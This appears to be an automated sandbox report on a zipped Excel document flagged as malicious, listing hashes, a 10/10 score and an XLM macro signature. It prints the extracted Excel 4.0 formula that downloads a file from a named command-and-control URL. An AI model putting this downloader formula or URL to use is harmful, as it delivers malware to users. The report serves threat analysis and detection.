Overview

overview

10

Static

static

10

document-6...92.xls

windows7_x64

10

document-6...92.xls

windows10_x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    this_issue (74).zip

  • Size

    11KB

  • MD5

    bb7b00cde705ee43343e0a0e05182ca3

  • SHA1

    74350d46d4f32913e085de4e797099c6ba7ea5de

  • SHA256

    4d06324eecb613b38d794f04d701378645a28f9e87b1056b95339323c150d93c

  • SHA512

    77e70f0bd3157b7dd5668b3c854a5a9a91dd3c94f1ffd5fda60a01da68de6ac0bfc40c4c936b165cdcc86035f8fdecfb1f292a70e11029b6f46238cd6d6cf37c

Score
10/10
macroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://dzw10jpcgj03fckc.com/inda.xls

Attributes
  • formulas

    =CALL("URLMon","URLDownloadToFileA","JJCCBB",0,"http://dzw10jpcgj03fckc.com/inda.xls","..\fkruf.djr",0)

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

    macroxlm

Files

  • this_issue (74).zip
    .zip
  • document-630335192.xls
    .xls windows office2003